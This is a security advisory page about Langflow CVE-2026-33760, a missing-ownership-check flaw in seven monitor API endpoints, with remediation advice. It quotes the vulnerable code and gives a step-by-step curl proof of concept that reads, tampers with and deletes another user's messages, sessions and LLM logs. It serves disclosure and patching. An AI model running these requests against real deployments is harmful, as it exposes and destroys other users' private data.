Langflow CVE-2026-33760
HIGH
GHSA-9c59-2mvc-vfr8
Severity by source
AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Remote HTTP API (AV:N), no special timing or config (AC:L), any authenticated user suffices (PR:L), no interaction (UI:N); cross-tenant read, tamper, and delete yield C:H/I:H/A:H within the same app (S:U).
Primary rating from GitHub Advisory.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Lifecycle Timeline
2DescriptionGitHub Advisory
Summary
Langflow's /api/v1/monitor router exposes 7 endpoints that perform read, write, and delete operations on user-owned resources - messages, sessions, build artifacts, and LLM transaction logs - without verifying that the authenticated requester owns the targeted resource. Any authenticated user can read, modify, rename, or permanently delete another user's data by supplying the target's resource ID or flow_id. This is a classic IDOR/BOLA vulnerability. Notably, the same source file (monitor.py) contains one correctly-implemented endpoint that uses an ownership check, demonstrating the correct pattern was known but inconsistently applied.
Details
Source file: src/backend/base/langflow/api/v1/monitor.py
The correct pattern (used only in GET /monitor/messages, lines 77-80):
stmt = select(MessageTable)
stmt = stmt.join(Flow, MessageTable.flow_id == Flow.id)
stmt = stmt.where(Flow.user_id == current_user.id)
# ownership enforcedAll 7 vulnerable endpoints are missing this guard:
1. GET /api/v1/monitor/builds (lines 27-33) - reads build data for any flow_id:
@router.get("/builds", dependencies=[Depends(get_current_active_user)])
async def get_vertex_builds(flow_id: Annotated[UUID, Query()], session: DbSession):
vertex_builds = await get_vertex_builds_by_flow_id(session, flow_id)
# no ownership check
return VertexBuildMapModel.from_list_of_dicts(vertex_builds)2. DELETE /api/v1/monitor/messages (lines 102-107) - deletes any message by UUID:
@router.delete("/messages", status_code=204, dependencies=[Depends(get_current_active_user)])
async def delete_messages(message_ids: list[UUID], session: DbSession):
await session.exec(delete(MessageTable).where(MessageTable.id.in_(message_ids)))
# message_ids accepted verbatim, no ownership check3. PUT /api/v1/monitor/messages/{message_id} (lines 110-134) - overwrites any message:
db_message = await session.get(MessageTable, message_id)
# no check: db_message.flow_id → Flow.user_id == current_user.id
db_message.sqlmodel_update(message_dict)4. PATCH /api/v1/monitor/messages/session/{old_session_id} (lines 137-171) - renames any session:
stmt = select(MessageTable).where(MessageTable.session_id == old_session_id)
# no JOIN to Flow, no WHERE Flow.user_id == current_user.id5. DELETE /api/v1/monitor/messages/session/{session_id} (lines 174-188) - bulk-deletes any session:
await session.exec(
delete(MessageTable).where(col(MessageTable.session_id) == session_id)
# no ownership filter
)6. GET /api/v1/monitor/transactions (lines 191-211) - reads LLM prompt/response logs for any flow_id:
stmt = select(TransactionTable).where(TransactionTable.flow_id == flow_id)
# no JOIN to Flow, no WHERE Flow.user_id == current_user.id7. DELETE /api/v1/monitor/builds - deletes build records for any flow_id: Shares the same root cause as endpoint #1 (GET /builds): flow_id is accepted as a bare query parameter and passed to the deletion path without a WHERE Flow.user_id == current_user.id ownership check, so any authenticated user can destroy another user's build artifacts.
PoC
Tested on Langflow v1.7.3 (langflowai/langflow:1.7.3) with two accounts: langflow (victim) and attacker_test (attacker).
# Setup: authenticate both users
TOKEN=$(curl -s -X POST http://localhost:7860/api/v1/login \
-d "username=langflow&password=langflow" \
| python3 -c "import sys,json; print(json.load(sys.stdin)['access_token'])")
ATTKR=$(curl -s -X POST http://localhost:7860/api/v1/login \
-d "username=attacker_test&password=Attacker123" \
| python3 -c "import sys,json; print(json.load(sys.stdin)['access_token'])")
# Victim creates a flow (attacker only needs to know the flow_id - obtainable via brute force or enumeration)
FLOW_ID=$(curl -s -X POST http://localhost:7860/api/v1/flows/ \
-H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" \
-d '{"name":"victim-flow","data":{"nodes":[],"edges":[]}}' \
| python3 -c "import sys,json; print(json.load(sys.stdin)['id'])")
# PoC 1: Read victim's LLM transaction logs (prompts + model responses)
curl -s "http://localhost:7860/api/v1/monitor/transactions?flow_id=$FLOW_ID" \
-H "Authorization: Bearer $ATTKR"
# HTTP 200 - full transaction log returned including user prompts and model responses
# PoC 2: Read victim's build data
curl -s "http://localhost:7860/api/v1/monitor/builds?flow_id=$FLOW_ID" \
-H "Authorization: Bearer $ATTKR"
# HTTP 200
# PoC 3: Delete victim's message (MESSAGE_ID obtained from transaction log above)
curl -s -X DELETE "http://localhost:7860/api/v1/monitor/messages" \
-H "Authorization: Bearer $ATTKR" -H "Content-Type: application/json" \
-d '["<victim_message_id>"]'
# HTTP 204 - message deleted
# PoC 4: Tamper with victim's message content
curl -s -X PUT "http://localhost:7860/api/v1/monitor/messages/<victim_message_id>" \
-H "Authorization: Bearer $ATTKR" -H "Content-Type: application/json" \
-d '{"text":"TAMPERED BY ATTACKER"}'
# HTTP 200 - message overwritten, "edit":true set
# PoC 5: Rename victim's session
curl -s -X PATCH \
"http://localhost:7860/api/v1/monitor/messages/session/victim-session-1?new_session_id=attacker-controlled" \
-H "Authorization: Bearer $ATTKR"
# HTTP 200 - session renamed
# PoC 6: Bulk-delete victim's entire session
curl -s -X DELETE \
"http://localhost:7860/api/v1/monitor/messages/session/victim-session-2" \
-H "Authorization: Bearer $ATTKR"
# HTTP 204 - entire session deletedAll 6 demonstrated attack vectors confirmed (the 7th, DELETE /builds, shares the GET /builds root cause and was not separately scripted). After attacker operations: victim's message text read "TAMPERED BY ATTACKER", session renamed to attacker-controlled name, second session completely deleted.
Impact
This vulnerability affects any Langflow deployment with multiple users (team instances, SaaS deployments, enterprise self-hosted).
Confidentiality: GET /transactions exposes the full LLM conversation history - user-submitted prompts and model responses - for any flow by flow_id. In healthcare, legal, financial, or HR deployments this directly exposes sensitive and potentially regulated data (HIPAA, GDPR). GET /builds exposes internal workflow execution state.
Integrity: PUT /messages/{id} allows rewriting any stored message, corrupting chat history, audit trails, and RAG-indexed memory. PATCH /messages/session/{id} allows renaming sessions, breaking session continuity and potentially injecting victim context into attacker-controlled namespaces.
Availability: DELETE /messages and DELETE /messages/session/{id} enable permanent, irreversible destruction of another user's conversation history and LLM logs. No recovery mechanism exists once data is deleted.
Any registered user account (including self-registered accounts if registration is open) has unrestricted cross-user access to all 6 operations against any other user's data.
Articles & Coverage 1
AnalysisAI
Cross-tenant data access in Langflow versions prior to 1.9.0 allows any authenticated user to read, modify, rename, or permanently delete other users' messages, sessions, build artifacts, and LLM transaction logs via seven unprotected /api/v1/monitor endpoints. The flaw stems from missing ownership checks (IDOR/BOLA) where flow_id or resource UUIDs are accepted verbatim without verifying the requester owns them. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Requires (1) a multi-user Langflow deployment running a version below 1.9.0 with the `/api/v1/monitor` router exposed (default in standard installations), (2) any valid authenticated session - a self-registered account suffices when open registration is enabled, otherwise any low-privilege team member account - matching PR:L in the CVSS vector, and (3) knowledge or guessing of a target `flow_id` (UUID), `message_id`, or `session_id`. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 3.1 vector AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (8.8) is well-supported: the attack is fully remote over HTTP, requires only a low-privilege authenticated account (any registered user, including self-registered if open registration is enabled), needs no user interaction, and produces full confidentiality, integrity, and availability impact on every other tenant's monitor data. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker registers (or is given) any low-privilege Langflow account on a shared/SaaS instance, authenticates to obtain a bearer token, and either enumerates or brute-forces a victim's `flow_id` (UUIDv4, but often guessable when leaked via screenshots, support tickets, or shared links). They then call `GET /api/v1/monitor/transactions?flow_id=<victim>` to exfiltrate the victim's full LLM prompt/response history (potentially PHI, PII, or proprietary data), and optionally call `DELETE /api/v1/monitor/messages/session/<session_id>` to permanently destroy the conversation. … |
| Remediation | Vendor-released patch: upgrade Langflow to 1.9.0 or later (`pip install -U langflow` or pull `langflowai/langflow:1.9.0` / newer), per GHSA-9c59-2mvc-vfr8 (https://github.com/langflow-ai/langflow/security/advisories/GHSA-9c59-2mvc-vfr8). … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours: identify all Langflow deployments and confirm versions in use; extract and review access logs for the past 30 days on the seven /api/v1/monitor endpoints for evidence of cross-user resource access. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
More from same product – last 7 days
Unauthenticated remote attackers can invoke MCP tool handlers and exfiltrate the operator's long-lived Meta Graph API ac
Remote code execution in Splunk Enterprise, Splunk Cloud Platform, and the Splunk Secure Gateway app allows a low-privil
Unauthenticated remote code execution in Crawl4AI versions <= 0.8.6 allows attackers to escape the AST-based sandbox in
Remote code execution in Langflow versions through 1.9.1 allows unauthenticated attackers to execute arbitrary Python co
Authenticated remote code execution in ChromaDB Python project versions 0.4.17 and later enables attackers holding the U
Share
External POC / Exploit Code
Leaving vuln.today